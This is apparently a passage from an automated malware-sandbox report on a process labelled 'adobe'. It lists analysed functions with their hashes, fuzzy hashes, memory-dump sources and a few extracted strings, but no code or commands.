Opcode ID: 04ebd424c49d26fa4a30c94ab1e092092165977de143c3139024ed891a1536b1
Instruction ID: a5c40e3fbc0ebe28e6e20ebb5a774bc17115789e51f612838a65bd23442c64b3
Opcode Fuzzy Hash: 04ebd424c49d26fa4a30c94ab1e092092165977de143c3139024ed891a1536b1
Instruction Fuzzy Hash: 38027E70B0021A8FDB54DB79D95466EB7A2FF84304F1485B9E426DB398EB31EC42CB90

Function 06B755E8 Relevance: 1.8, Strings: 1, Instructions: 600
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$, xrefs: 06B75939

Memory Dump Source

Source File: 00000005.00000002.1798962946.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6b70000_adobe.jbxd

Similarity

API ID:
String ID: $
API String ID: 0-3993045852
Opcode ID: 0e93b0deae836a6fe39b37b7b84001ebdaa70babbbc7b9a7b2286cdb9ab47e57
Instruction ID: e286416f4f7a8bf29915061a2a661bb6b66d7b060c348292abacaed6f44e090a
Opcode Fuzzy Hash: 0e93b0deae836a6fe39b37b7b84001ebdaa70babbbc7b9a7b2286cdb9ab47e57
Instruction Fuzzy Hash: BC22E4B6E042198FDF74DBA4C5806AEB7B2FF85320F2084A9D425AB395DB31DD41CB90

Function 06B76638 Relevance: .8, Instructions: 822COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1798962946.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6b70000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3f7e97a4cd7218a555467268f87244470f5d7afcfc190c07e1776de82fd98e6
Instruction ID: 837303ab6dfee938df8c72e257695661f3ccbac01d541b149e420839db5403cb
Opcode Fuzzy Hash: f3f7e97a4cd7218a555467268f87244470f5d7afcfc190c07e1776de82fd98e6
Instruction Fuzzy Hash: FD62AE74A106098FDF54DB68D554AADB7F2FF88314F1484A9E826EB394EB31EC41CB90

Function 06B7C1D8 Relevance: .6, Instructions: 643COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1798962946.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6b70000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 45d379d238424c58348946f74116ac8c133b8fbc49e0e7ef67c7ca2b046f42d4
Instruction ID: 0005dd9c84aae72252ecf67bd4021f9e08fd966cbb9d45bf989735d24488b494
Opcode Fuzzy Hash: 45d379d238424c58348946f74116ac8c133b8fbc49e0e7ef67c7ca2b046f42d4
Instruction Fuzzy Hash: C7329074B002098FDF54DBA9D890BADBBB2FB88310F109569E516EB395DB35EC41CB90

Function 06B7B26F Relevance: .6, Instructions: 570COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1798962946.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6b70000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40c8371c9ab1205a79881a4e4314cdb696b0bcd8a311c3ead09535611c72cede
Instruction ID: e57b1d5f081c601c7f0cc5df4534e1ebc9098ab3f440e2905f9fd8aa20240f43
Opcode Fuzzy Hash: 40c8371c9ab1205a79881a4e4314cdb696b0bcd8a311c3ead09535611c72cede
Instruction Fuzzy Hash: 692280B0E102098BDFA4DF68D5907AEB7B2FB49310F2094A6E425EB395DA35DC818F51

Function 06B7AD18 Relevance: 10.4, Strings: 8, Instructions: 388
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$eq, xrefs: 06B7AEC7
$eq, xrefs: 06B7AE98
$eq, xrefs: 06B7AEBB
$eq, xrefs: 06B7AE39
$eq, xrefs: 06B7AEE4
$eq, xrefs: 06B7AE8C
$eq, xrefs: 06B7AE45
$eq, xrefs: 06B7AEF0

Memory Dump Source

Source File: 00000005.00000002.1798962946.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6b70000_adobe.jbxd

Similarity

API ID:
String ID: $eq$$eq$$eq$$eq$$eq$$eq$$eq$$eq
API String ID: 0-1110479544
Opcode ID: 345481112daf6b04d85fc4cdc48c454a50de4a0922707c96614a1a06d8db6d5b
Instruction ID: 05ec0057777e58770b561aa159f9bb62cfb1f577b2c681cde89438006176ab79
Opcode Fuzzy Hash: 345481112daf6b04d85fc4cdc48c454a50de4a0922707c96614a1a06d8db6d5b
Instruction Fuzzy Hash: AFE17170E1020A8FDF95DFA9D5906AEB7B2FF85304F208569E416EB354EB309C46CB91

Function 06B7B6A0 Relevance: 8.0, Strings: 6, Instructions: 466
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$eq, xrefs: 06B7BBFD
$eq, xrefs: 06B7BBF1
$eq, xrefs: 06B7BC31
$eq, xrefs: 06B7BC25
$eq, xrefs: 06B7BC59
$eq, xrefs: 06B7BC65

Memory Dump Source

Source File: 00000005.00000002.1798962946.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6b70000_adobe.jbxd

Similarity

API ID:
String ID: $eq$$eq$$eq$$eq$$eq$$eq
API String ID: 0-220072568
Opcode ID: 29030a8c3d2f306ebafd587e5bda136e40c7d05e03ec99cfb9268f5480b4cda7
Instruction ID: 122bda659cbb196e4d1eb321bc20f8e91fc1ecbc6a070e789abd5c256a782dac
Opcode Fuzzy Hash: 29030a8c3d2f306ebafd587e5bda136e40c7d05e03ec99cfb9268f5480b4cda7
Instruction Fuzzy Hash: 4E027CB0E1020A8FDFA4DF69D5806ADB7B2FB45314F2085AAD425EB255DB31EC81CF91

Function 06B79198 Relevance: 5.2, Strings: 4, Instructions: 230
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$eq, xrefs: 06B7921A
$eq, xrefs: 06B791EB
$eq, xrefs: 06B79226
$eq, xrefs: 06B791DF

Memory Dump Source

Source File: 00000005.00000002.1798962946.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6b70000_adobe.jbxd

Similarity

API ID:
String ID: $eq$$eq$$eq$$eq
API String ID: 0-812946093
Opcode ID: c8d86d8e3f609298edd5a76df90368c6c2f7ce98b07f50cb71c30df0515ac1b1
Instruction ID: cf333234d3978456d7e51f3e980ed9e9f362e732b5b804083ed1fba7fd68ea04
Opcode Fuzzy Hash: c8d86d8e3f609298edd5a76df90368c6c2f7ce98b07f50cb71c30df0515ac1b1
Instruction Fuzzy Hash: 82914F74F0061A8FDF54EF79D950BAEB7F6FB84200F1085A9D419EB358EA30AD418B91

Function 06B7CFA0 Relevance: 4.6, Strings: 3, Instructions: 801
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$eq, xrefs: 06B7D3AB
$eq, xrefs: 06B7D39F
$eq, xrefs: 06B7D397

Memory Dump Source

Source File: 00000005.00000002.1798962946.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6b70000_adobe.jbxd

Similarity

API ID:
String ID: $eq$$eq$$eq
API String ID: 0-177832560
Opcode ID: 977f48c4e7054259b886fc02d456368c18d8522543976aaf122f7ca8683c4493
Instruction ID: 8f7c4ad6e77fdd88356449d2cf752493bf288bc10e74eb9ed3374f3e1efbe422
Opcode Fuzzy Hash: 977f48c4e7054259b886fc02d456368c18d8522543976aaf122f7ca8683c4493
Instruction Fuzzy Hash: 29625370A0061A8FCB55EB79D590A5EB7F2FF84344B108A68D0169F359EB31FC86CB91

Function 06B74BB0 Relevance: 3.9, Strings: 3, Instructions: 186
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

fjq, xrefs: 06B74BDB
\Ojq, xrefs: 06B74D8B
XPjq, xrefs: 06B74D01

Memory Dump Source

Source File: 00000005.00000002.1798962946.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6b70000_adobe.jbxd

Similarity

API ID:
String ID: fjq$XPjq$\Ojq
API String ID: 0-216941231
Opcode ID: d78be9a8d73293618d5eaccd0c34db11d31c70c738890e109c708e7b4d304542
Instruction ID: c3ee2434a4fcd8c48eabfb9e103a2a0ff6d97ae870d1281501c933fe04988892
Opcode Fuzzy Hash: d78be9a8d73293618d5eaccd0c34db11d31c70c738890e109c708e7b4d304542
Instruction Fuzzy Hash: 80619170F102199FEB599FA8C8147AEBBF6FF88700F208129D116AB394DB755C418B90

Function 06B79188 Relevance: 2.7, Strings: 2, Instructions: 163
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$eq, xrefs: 06B7921A
$eq, xrefs: 06B791DF

Memory Dump Source

Source File: 00000005.00000002.1798962946.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6b70000_adobe.jbxd

Similarity

API ID:
String ID: $eq$$eq
API String ID: 0-2246304398
Opcode ID: a7390dc6914a54878b37a8a1b6e7903fdef230148a5ae0207659ea4c33b56d2d
Instruction ID: 005de3f792e3f55448cddeaa9fe460fe7c79820dbf2f045c85725b5a42205698
Opcode Fuzzy Hash: a7390dc6914a54878b37a8a1b6e7903fdef230148a5ae0207659ea4c33b56d2d
Instruction Fuzzy Hash: 09517374B006199FDF54EB78D9A4BAE73F6FB88200F108569D419D73ACEA30EC418B91

Function 06B74BA0 Relevance: 2.6, Strings: 2, Instructions: 146
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

fjq, xrefs: 06B74BDB
XPjq, xrefs: 06B74D01

Memory Dump Source

Source File: 00000005.00000002.1798962946.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6b70000_adobe.jbxd

Similarity

API ID:
String ID: fjq$XPjq
API String ID: 0-1938862144
Opcode ID: 4b5df5acf14d545de0229c20f137eddc410f35d11d3d38507978f9ea82688183
Instruction ID: f1ee29b9b54616447391339bda5a18e25c4b4d8a831f84934ff8a3a10e43ae33
Opcode Fuzzy Hash: 4b5df5acf14d545de0229c20f137eddc410f35d11d3d38507978f9ea82688183
Instruction Fuzzy Hash: 83519474F102199FDB559FA9C854BAEBBF7FF88700F208529D115AB394DB709C418B90

Function 013AED40 Relevance: 1.6, APIs: 1, Instructions: 135
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000005.00000002.1784478751.00000000013A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_13a0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2df36bc75c70c108aa47c80ca64eb9380b235f7b1e283e7312ecaedc61c0c8d
Instruction ID: 204aba830783915c48422b027e98b107f5dda8cebe9177de772cbdf1fe3b20c1
Opcode Fuzzy Hash: c2df36bc75c70c108aa47c80ca64eb9380b235f7b1e283e7312ecaedc61c0c8d
Instruction Fuzzy Hash: 4A412372D043598FCB14DF69D8047EEBBF5EF88310F14866AD509AB290DB789845CBE0

Function 013AEE28 Relevance: 1.6, APIs: 1, Instructions: 52
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalMemoryStatusEx.KERNEL32 ref: 013AEE8F

Memory Dump Source

Source File: 00000005.00000002.1784478751.00000000013A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_13a0000_adobe.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: 925989009fc96b65fd58d78a2e287abe84fbcb969a264569ca05783fbf85dee2
Instruction ID: 81549d3e308d811f659a71afbfc007141cefebbbb3a6fddd7041faeecee1b4b8
Opcode Fuzzy Hash: 925989009fc96b65fd58d78a2e287abe84fbcb969a264569ca05783fbf85dee2
Instruction Fuzzy Hash: 2D111FB1C006599FDB10CFAAC444A9EFBF8EF48324F15812AD918A7240D378A944CFA1

Function 06B7DB15 Relevance: 1.4, Strings: 1, Instructions: 125COMMON

Download Yara Rule

Strings

PHeq, xrefs: 06B7DC71

Memory Dump Source

Source File: 00000005.00000002.1798962946.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6b70000_adobe.jbxd

Similarity

API ID:
String ID: PHeq
API String ID: 0-2873676430
Opcode ID: d5307c803ebf18555a0fcb2119090d01431c3d709e81550ffb7af96b4cf18037
Instruction ID: 86f643da698111aa4368f14676c56e76f5161afa0b604489d61081de6e1398aa
Opcode Fuzzy Hash: d5307c803ebf18555a0fcb2119090d01431c3d709e81550ffb7af96b4cf18037
Instruction Fuzzy Hash: 0741C4B0E006099FDB65DF75D44069EBBB2FF89380F104969E425EB354EB71A842CB90

Function 06B72200 Relevance: 1.4, Strings: 1, Instructions: 105COMMON

Download Yara Rule

Strings

PHeq, xrefs: 06B7233B

Memory Dump Source

Source File: 00000005.00000002.1798962946.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6b70000_adobe.jbxd

Similarity

API ID:
String ID: PHeq
API String ID: 0-2873676430
Opcode ID: 9c5f7d947d07070a3837d9b4deaf340f836366c91ccc2e26eaeaa12ce063283e
Instruction ID: 342b05236dec91848ee6308a974c053608b2e7e213d6ab94097eedabefe725c9
Opcode Fuzzy Hash: 9c5f7d947d07070a3837d9b4deaf340f836366c91ccc2e26eaeaa12ce063283e
Instruction Fuzzy Hash: EC31D070B102058FDF59AB75D51466F7BA3EB89200F2045B8D416DB3A8EF36DD86CB90

Function 06B74A99 Relevance: 1.3, Strings: 1, Instructions: 25COMMON

Download Yara Rule

Strings

\Ojq, xrefs: 06B74AA5

Memory Dump Source

Source File: 00000005.00000002.1798962946.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6b70000_adobe.jbxd

Similarity

API ID:
String ID: \Ojq
API String ID: 0-1665755004
Opcode ID: f0475f32200928853c05a02da57a92748e6c01b2354fc89785ab16ecc915a33d
Instruction ID: ad5b2c606dfd6b2f8c639c3ec4618f27764632597891def821d282a3178c6cd0
Opcode Fuzzy Hash: f0475f32200928853c05a02da57a92748e6c01b2354fc89785ab16ecc915a33d
Instruction Fuzzy Hash: 98F0FE70E24129DFDB24DF94E959BAE7BB2FF88B05F200129E012A7294CB751C41CB80

Function 06B7277A Relevance: 1.0, Instructions: 1028COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1798962946.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6b70000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fcd2c3780dde6615deacd5898d76a3ef52287aeb0dd3515c05de2ae1d1eb865
Instruction ID: 5178da9d05e43767b510a9137f7d36e11ffe623d489988ec0e8c9e08cc317bfa
Opcode Fuzzy Hash: 2fcd2c3780dde6615deacd5898d76a3ef52287aeb0dd3515c05de2ae1d1eb865
Instruction Fuzzy Hash: FF925574E002048FDBA4DB68C584A5DBBF2FF49314F5484A9E42AEB361DB35ED85CB90

Function 06B76230 Relevance: .2, Instructions: 229COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1798962946.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6b70000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be1f0a4507c23d56b2ce5e065929893c5d27d3c78e383c5c4d15c43a99399cd4
Instruction ID: f0a8099d5534667810a04778bc218243d8f03748a6862fca7d3b4f8cc5cf6452
Opcode Fuzzy Hash: be1f0a4507c23d56b2ce5e065929893c5d27d3c78e383c5c4d15c43a99399cd4
Instruction Fuzzy Hash: E961B3B1F005124BCF549A7EC89066FAAD7EFD4210B254579D80EEB364EE69EC0287D1

Function 06B742E2 Relevance: .2, Instructions: 225COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1798962946.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6b70000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d17b661c7064c7f5f0c4830334a1d104e7ecef704af2a6a4dfb14505f8b01796
Instruction ID: 9e5113bf4477bd3a810a3ec059e944c16e423aad3f0d7f83ace0f31137af6a18
Opcode Fuzzy Hash: d17b661c7064c7f5f0c4830334a1d104e7ecef704af2a6a4dfb14505f8b01796
Instruction Fuzzy Hash: 24817B70B006098FDF54DFA8D5506AEB7F2EB89300F108569D51AEB398EB35DC828B91

Function 06B74600 Relevance: .2, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1798962946.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6b70000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd84f7dfc5bc3eafcb097564bee5ed9728dd0243b77733d45d13b2b760d39b91
Instruction ID: 8842af032cd1b6eee7a92fb1e5b52c7107c310a1d797f802d706bbc7b94b6f5a
Opcode Fuzzy Hash: dd84f7dfc5bc3eafcb097564bee5ed9728dd0243b77733d45d13b2b760d39b91
Instruction Fuzzy Hash: 5A915E70E102198FDF60DF68C880B9DB7B1FF89300F208695D559BB295DB70AA85CF91

Function 06B74618 Relevance: .2, Instructions: 210COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1798962946.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6b70000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d5bfb5b06db9f16652bd8f7d7476adf0f586186179541a73e14dafddc04003d4
Instruction ID: 1c07d3b510811db782946c18cda11b220908c1c701021eed1620728e63065416
Opcode Fuzzy Hash: d5bfb5b06db9f16652bd8f7d7476adf0f586186179541a73e14dafddc04003d4
Instruction Fuzzy Hash: 0D914070E102198BDF64DF68C880B9DB7B1FF89304F208595D559BB395EB70AA85CF90

Function 06B7EF78 Relevance: .2, Instructions: 204COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1798962946.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6b70000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b094de305575a66c092467e199dd3a46bebe7a73c3a3e132e2ebf480da1b01df
Instruction ID: 1eefdbcd0cdcdc360081175ed5b34079496182a2cff60c3bfd6131af07fa22e9
Opcode Fuzzy Hash: b094de305575a66c092467e199dd3a46bebe7a73c3a3e132e2ebf480da1b01df
Instruction Fuzzy Hash: 2D715CB0A002198FDB54DFA9D990AADBBF6FF88304F248569E015AB754DB30ED46CB50

Function 06B7EF88 Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1798962946.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6b70000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 781a3902c75a6c265a779e309c0c95866654c576fbe936afd5530d71cd5a5ecb
Instruction ID: cbb42676b12ecbf52d874a5688ff77f54b59c05e1e7dcccd8022ba1351ff0145
Opcode Fuzzy Hash: 781a3902c75a6c265a779e309c0c95866654c576fbe936afd5530d71cd5a5ecb
Instruction Fuzzy Hash: 5B713CB0A002198FDB54DFA9D990AADBBF6FF88304F248569E015EB754DB30ED46CB50

Function 06B7FC11 Relevance: .2, Instructions: 176COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1798962946.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6b70000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17f4abd4c477031d80e4b07106565c620d3fedf986140267fac7b7e60eecc917
Instruction ID: 0e9384c0169e8eee1f65465a89a9150fce71f251d91aed5559506a4b96931f78
Opcode Fuzzy Hash: 17f4abd4c477031d80e4b07106565c620d3fedf986140267fac7b7e60eecc917
Instruction Fuzzy Hash: C151E3B1E001099FDF54EBB8E4442BDBBB6FF84315F2048B9E126DB254DB319845CB94

Function 06B7F9C1 Relevance: .2, Instructions: 169COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1798962946.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6b70000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ace73d8c0fef983e94678e17ceac7d824911d7bd66baae4827bb95f13e9f1ab
Instruction ID: 59bebed57d7b9fe6a01e0e3ccd2dd3ebf491dd4aa6fded2762ba73bd07fe15e9
Opcode Fuzzy Hash: 0ace73d8c0fef983e94678e17ceac7d824911d7bd66baae4827bb95f13e9f1ab
Instruction Fuzzy Hash: 665129B0B201189BEFA4567DD85073F366EDBC9310F204526E11AC73D9CB78DC8187A2

Function 06B7F9D0 Relevance: .2, Instructions: 163COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1798962946.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6b70000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e38b1c594bc77e9c52ff284634983ac237bf58586d374fab1c91fd170089127f
Instruction ID: b96ed6d7c753ee1d3c60d9c5f648734ae6939d55ddd75e5468fd72a9eb6c7e5c
Opcode Fuzzy Hash: e38b1c594bc77e9c52ff284634983ac237bf58586d374fab1c91fd170089127f
Instruction Fuzzy Hash: 905107B0B201189BEFA466BDD85473F366FD7C9310F20452AE51AC7399CB78DC8147A6

Function 06B755D8 Relevance: .1, Instructions: 148COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1798962946.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6b70000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05a01a0987dd0eb8cf84ab02ef79807b59b2a2384085a6d65584afa0e2b3b260
Instruction ID: d48c0d979ebe6d8d6040169566e3622e5748cc52c8020021e9a58181d3abc49a
Opcode Fuzzy Hash: 05a01a0987dd0eb8cf84ab02ef79807b59b2a2384085a6d65584afa0e2b3b260
Instruction Fuzzy Hash: 685185B6E002098FDF718A69C4C077EBBB2FB45310F2499A9E165DB285CE35E941CB91

Function 06B7545A Relevance: .1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1798962946.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6b70000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4285d02199fb3c762bcd48ccbf0fb04a414929204851de44b46bd47d1321941b
Instruction ID: 9861d3b19dad52d94e23985192de9b7f319bbf187c11fa0b4c5e55ae1a7507e6
Opcode Fuzzy Hash: 4285d02199fb3c762bcd48ccbf0fb04a414929204851de44b46bd47d1321941b
Instruction Fuzzy Hash: 144162B2E006059FDB70CFA9D880AAFFBB2FB45310F10496AE266D7650D730E9558B91

Function 06B7D9C8 Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1798962946.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6b70000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b53cb8c2d83b0a198076fe7fa9a9863b52c7c0fd004cf2808631e4af23a03e20
Instruction ID: 53adf9bee593e93a8f64f68a5286896a7a0af9a622e1f94a6b0a30ec03a69a5b
Opcode Fuzzy Hash: b53cb8c2d83b0a198076fe7fa9a9863b52c7c0fd004cf2808631e4af23a03e20
Instruction Fuzzy Hash: E531C470E1461A8BDF64DF69D58069EB7B2FF84300F108A69E416EB644EB70A942CB90

Function 06B720B0 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1798962946.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6b70000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ead2ac745c003607df670b6a947c768ef65dd6072f4ee057a55d8dcb5ebed7cf
Instruction ID: 84db70869174185f21ee4877d819029c6bf8388d1cb00170f9f6f9255e666b40
Opcode Fuzzy Hash: ead2ac745c003607df670b6a947c768ef65dd6072f4ee057a55d8dcb5ebed7cf
Instruction Fuzzy Hash: 0C31B070E0021A9FDB59CFA9C95469EB7F2FF89300F108569E916EB750DB31AD42CB90

Function 06B720C0 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1798962946.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6b70000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e7db5d4b2f7dbd9baaa7b5ab047a85889f5d0c041692c1a62d1e6b0a4ab1bfa
Instruction ID: f71ae03d99d9676cbf2bc71810fdee05a5435ee2a7c8043d407db633b8dc5336
Opcode Fuzzy Hash: 0e7db5d4b2f7dbd9baaa7b5ab047a85889f5d0c041692c1a62d1e6b0a4ab1bfa
Instruction Fuzzy Hash: 7031AE70E0061A9FDB58CFA9C95469EB7F2FF89300F108529E916EB750DB31AD42CB90

Function 06B73EF8 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1798962946.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6b70000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48132955acc7ee8bcfa3dcd3d9d069345632865f90afff2e58a29c3b8a722e17
Instruction ID: 553cdee425e43697cbc35353254e5821d5e8ba12f95509a5e64a385bd1e5d682
Opcode Fuzzy Hash: 48132955acc7ee8bcfa3dcd3d9d069345632865f90afff2e58a29c3b8a722e17
Instruction Fuzzy Hash: 71217AB5F002199FDB40DF69D990AAEB7F1FB48350F108066E915EB394E735D9008B90

Function 06B73EE9 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1798962946.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6b70000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8f692236357dcf00551e83d3943fe960cded10e271a000a9d38dadcff311efc
Instruction ID: 31ac93d824b4624e89e4133344c9870ba181fd5c42b2b63a4bbbcd1a71661e6a
Opcode Fuzzy Hash: b8f692236357dcf00551e83d3943fe960cded10e271a000a9d38dadcff311efc
Instruction Fuzzy Hash: A0218EB2F0021A9FDF40DF69D950AAEB7F1FB88350F10816AE915EB394E735D9108B90

Function 0115D030 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1783245105.000000000115D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0115D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_115d000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18a7d0df876e6cc029c92872f2ee96beca96ea5cd9f5bfbb89dbd448a9ea6a25
Instruction ID: 8cb759ef1de6782f157143a88180e951c20ae3561185bf66161d242d6de09523
Opcode Fuzzy Hash: 18a7d0df876e6cc029c92872f2ee96beca96ea5cd9f5bfbb89dbd448a9ea6a25
Instruction Fuzzy Hash: 3F2100B1604200DFDF59DF98E980B26BBA5EB88314F24C56DED0A4B242C33AD447CB62

Function 0115D006 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

